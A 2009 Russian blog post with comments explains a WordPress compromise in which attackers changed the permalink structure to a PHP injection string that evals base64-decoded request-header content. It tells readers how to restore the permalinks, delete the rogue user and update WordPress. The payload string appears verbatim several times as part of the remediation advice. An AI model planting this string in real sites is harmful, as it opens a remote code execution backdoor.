Сегодня вордпресс сломали (eval base64_decode _SERVER[HTTP_REFERER]) (wp hack)
Пятница, сентября 4, 2009 20:47
Именно такая строчка:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такая:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Приклеилась сегодня к моим ссылкам на полную новость.Эта проблема надлюбалась у многих блоггеров в основном западных.
Выглядело это так:
http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Вместо нормального:
http://zeddy.ru/2009/08/27/ryadovye-budni-seoshnika/
Гугля нашел уже 1700 сломанных блогов
Рассказываю как пофиксить , если у вас та же проблема
Идем в
Настройки->Постоянные ссылки (ЧПУ)
видим что кто то исправил вид чпу на вот такой:
/%year%/%monthnum%/%day%/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Исправляем назад, на это:
/%year%/%monthnum%/%day%/%postname%/
Да и не забываем удалить последнего зарегистрировавшегося пользователя с именем
MikeWink E-mail: bugbeemershonyhe@gmail.com
Западные блоггеры говорят что это все он, у меня тоже такой был как раз последний зарегистрировавшийся, так что наверное не врут.
За одно незабываем обновляться

says:
сентября 4, 2009 at 21:35
У меня блог на этой неделе, также был сломан, и 1 сателлит. сижу обновляю вп на своей сетке
says:
сентября 4, 2009 at 22:14
Жопа в том что непонятно как пролезли, и устранена ли эта дырка в последнем WP
says:
сентября 5, 2009 at 0:51
ты не все просчитал зайди прочитай в моем блоге..
админа второго удолить нужно
хотя может у тебя не так
says:
сентября 5, 2009 at 10:24
У меня второго админа не было, видимо не доломали, но на всякий случай проверил по твоей схеме, спасибо
says:
сентября 5, 2009 at 10:44
2.8.4 тоже ломается.
На сателлитах наверное спасет, закрытие регистрации юзеров
says:
сентября 5, 2009 at 14:26
спасибо за предупреждение. полчаса проверяла свои блоги на ВП пока отписала в этом посте свою благодарность, правда нашла только на одном еще на 2,6 движке.. и юзер был такойже.. но там нет ничего ценного и на фтп пока ненашла чужого ничего )))))
says:
сентября 5, 2009 at 19:22
[...] (или что-то подобное), то прочитайте вот этот материал и оперативно исправьте возникшую проблему. [...]
says:
сентября 5, 2009 at 20:18
[...] (или что-то подобное), то прочитайте вот этот материал и оперативно исправьте возникшую [...]
says:
сентября 6, 2009 at 16:47
Спасибо за способ решения проблемы, у меня сломали один блог, который на 2.6, пользователя с именем mikewink удалил, второго админа не было. ЧПУ поменял на такие, какие были до этого, правда после этого начались проблемы с хостингом, предполагаю что это роботы превысили допустимые лимиты нагрузки, переиндексируя ЧПУ. Добавил директиву Crawl-delay, все заработало.
says:
сентября 6, 2009 at 19:33
Полат , обновиться не забыл?
says:
декабря 1, 2009 at 20:03
Даже старенький wp2.3.3 и тот поломали, траффик упал в 100 раз!!!! Интересен смысл этого мероприятия: не освобождение ли позиций в выдаче? Может это Black-сео-диверсия? Были у вас ключевики в первой десятке Googla или Яши?